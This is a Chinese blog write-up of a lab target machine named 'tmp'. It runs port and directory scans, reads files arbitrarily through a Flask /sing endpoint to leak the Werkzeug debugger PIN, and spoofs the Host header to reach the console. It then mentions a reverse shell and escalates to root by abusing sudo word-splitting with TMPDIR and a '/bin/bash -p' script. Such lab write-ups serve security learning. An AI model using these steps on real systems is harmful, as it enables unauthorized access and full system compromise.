当前位置: 首页 > news >正文

群友靶机tmp复现 - 场

Tmp

nmap -p- 192.168.10.4
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-10 07:20 EST
Nmap scan report for tmp (192.168.10.4)
Host is up (0.00060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
MAC Address: 08:00:27:88:55:23 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

5000端口看一眼,是flask搭的。

gobuster扫一下目录

gobuster dir -u http://192.168.10.4:5000 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -x html,txt,php,asp,aspx,zip,jz,js 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.4:5000
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,asp,aspx,zip,jz,js,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/console              (Status: 400) [Size: 167]
/songs                (Status: 200) [Size: 165]
Progress: 42714 / 42723 (99.98%)
===============================================================
Finished
===============================================================

有console,开了debug模式,算PIN码就能拿到shell了。翻了翻,在index.js中找到存在/sing?song=测试了一下可以任意文件读取,那么PIN码就可以读取或者计算了。

curl "http://192.168.10.4:5000/sing?song=/proc/self/fd/2" -s | grep -a "PIN"* Debugger PIN: 134-800-774

直接 拿到PIN码,但是访问console 400,报错页面开了禁用debug,js去改但是有了>>> 但是依然没有交互。

然后后面搜了搜,应该是Werkzeug>3.0.3版本仅支持回环地址或localhost,需要改host。

因此改下host即可输入PIN码,开始交互。我糖了,让ai写了个脚本交互。

之后反弹shell,拿到tuf权限。开始提权,注意到脚本中$SANDBOX_TARGET_FILE变量在执行时会导致词分割,同时配合TMPDIR变量让其执行我们的恶意脚本。

tuf@tmp:/tmp$ vi exp
tuf@tmp:/tmp$ cat exp
#!/bin/bash
/bin/bash -p
tuf@tmp:/tmp$ mkdir 'exp dir'
tuf@tmp:/tmp$ chmod 777 exp
tuf@tmp:/tmp$ sudo /usr/local/bin/getflag TMPDIR '/tmp/exp dir'
root@tmp:/tmp/exp dir/tmp.IaiKDa# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

tmp1

http://www.jsqmd.com/news/370910/

相关文章:

  • 基于Python的外卖配送分析与可视化系统源码文档部署文档代码讲解等
  • 基于SpringBoot+vue3的Web的家政服务管理平台的设计与实现(源码+lw+部署文档+讲解等)
  • d11
  • 2026年值得信赖的海外品牌营销推广盘点:助力企业出海的优质之选 - 品牌2025
  • 黑马大模型RAG与Agent智能体实战教程LangChain提示词——16、RAG开发——模板类format()和invoke()方法(所有模板类都继承了Runnable类,拥有这两个方法)
  • 详细介绍:STM32新建工程(标准库官网下载)
  • 构建之法
  • 推荐几家制造业海外推广获客公司,上海、苏州地区优质制造业外贸B2B营销服务商详细介绍 - 品牌2025
  • Polya 定理学习笔记
  • cad功能区当前没有加载任何选项卡或面板
  • C++最小惊讶原则
  • 推荐几家Linkedin推广获客公司推荐,五家值得关注的Linkedin推广获客服务商盘点 - 品牌2025
  • Android Studio - 在 Android Studio 中直观查看 Git 代码的更改
  • 嵌入式文件系统解决方案:fatfs支持FAT32文件系统
  • 详细介绍:day02 pyspark词频统计模板代码
  • P15139 [SWERC 2025] Expansion Plan 2 题解
  • IEEE69节点系统Simulink仿真:从基础到拓展的电力系统探索
  • Java毕设选题推荐:基于springboot的快递管理软件管理系统基于springboot的物流管理系统【附源码、mysql、文档、调试+代码讲解+全bao等】
  • Java毕设选题推荐:基于springboot的校园二手物品置换系统设计与实现校园二手物品推荐系统设计与实现【附源码、mysql、文档、调试+代码讲解+全bao等】
  • Java毕设选题推荐:基于springboot的面向新工科课程线上教学辅助平台学员管理、资料管理、考试管理【附源码、mysql、文档、调试+代码讲解+全bao等】
  • 不得不看!OpenClaw 爆火背后的三个真相
  • 盘点2026年有名的宝宝起名字专家,不错的婴儿取名大师推荐哪位 - 深度智识库
  • 2026年靠谱的公司起名大师推荐权威实测榜:泰斗级领军者领衔 避坑指南 - 深度智识库
  • 杭州司机速看!腾讯地图功能再升级,通勤效率拉满~
  • 应用安全 --- IDAPython脚本 之 导出交叉引用图
  • 八字取名大师推荐,这份权威推荐清单必看 - 深度智识库
  • 中国版“OpenClaw”来了!网易有道推出全场景个人助理Agent“LobsterAI”
  • 卡尔曼滤波算法原理详解:核心公式、C 语言代码建立及电机控制 / 目标追踪应用
  • Java毕设项目推荐-基于springboot的快递业务快递管理软件管理系统【附源码+文档,调试定制服务】
  • 一场机器人格斗,为何价值千万黄金?解码众擎URKL联赛背后的产业雄心 | 前沿在线